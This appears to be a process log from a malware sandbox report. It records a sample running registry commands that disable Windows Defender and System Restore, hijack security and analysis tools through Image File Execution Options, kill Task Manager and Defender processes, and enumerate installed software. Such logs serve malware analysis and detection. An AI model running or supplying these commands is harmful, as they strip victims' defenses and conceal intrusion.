C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f2⤵PID:112
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1060
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1100
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f2⤵PID:1520
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:772
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1380
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1800
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1796
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1792
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1592
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1568
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1340
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F2⤵
- Kills process with taskkill
PID:1996
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:796
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1812
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:536
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:824
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1268
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1608
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1060
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:624
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1084
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:660
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:1928
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:1380
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2000
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:1488
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:1336
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:584
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2004
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:2020
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:1612
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1496
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:2008
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:1840
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1916
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:1628
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:2012
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1804
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:1568
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:744
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1716
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:1268
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:1264
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1368
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:576
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:1864
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1036
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:1988
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:1944
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:112
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2044
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:2036
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:2024
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:240
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:1216
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:1996
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1848
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:1928
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:1656
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1100
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:748
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:1952
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1592
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:2020
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:2008
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:108
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1908
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:643⤵PID:552
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:323⤵PID:892
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1332
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:744
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:536
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1264
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:1912
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:2040
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:1644
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2024
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:1008
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:1968
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:860
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:643⤵PID:1860
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:323⤵PID:112
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1380
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:1796
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:1336
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:748
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:1624
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:684
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:1612
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1368
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:643⤵PID:1520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:323⤵PID:1572
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1812
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:660
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:1804
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1112
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:1840
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:1640
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1664
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:552
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:760
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1692
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵PID:1780
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:323⤵PID:752
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1788
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:643⤵PID:1652
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵PID:1936
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1852
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1608
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵PID:1216
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:1824
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1928
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵PID:1796
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:1624
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1708
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵PID:1520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:1088
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:824
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵PID:2000
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:2044
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:660
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵PID:2008
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵PID:2012
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1640
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵PID:480
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵PID:760
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:643⤵PID:1492
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:323⤵PID:1568
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2028
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:643⤵PID:1448
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:323⤵PID:1552
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1332
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:892
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:643⤵PID:1596
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:323⤵PID:108
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1652
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:643⤵PID:1984
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:323⤵PID:764
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1376
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:643⤵PID:1924
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:323⤵PID:1824
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1996
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:643⤵PID:1644
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:323⤵PID:1852
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1656
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:643⤵PID:1336
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:323⤵PID:1808
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1632
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:643⤵PID:1036
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:323⤵PID:1572
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1084
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1972
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:643⤵PID:1804
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:323⤵PID:1960
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1900
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:643⤵PID:1948
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:323⤵PID:1920
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1840
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:643⤵PID:1584
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:323⤵PID:480
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1780
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:643⤵PID:1120
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:323⤵PID:1568
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1112
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:643⤵PID:1496
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:323⤵PID:1552
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1812
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:556
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:1340
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1628
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:1596
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:1936
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1844
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:764
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:1216
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:112
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:643⤵PID:1912
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:323⤵PID:1644
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1820
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:684
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:1808
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2004
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:643⤵PID:1520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:323⤵PID:1612
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:2020
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1116
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:2044
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:1916
-
-
-
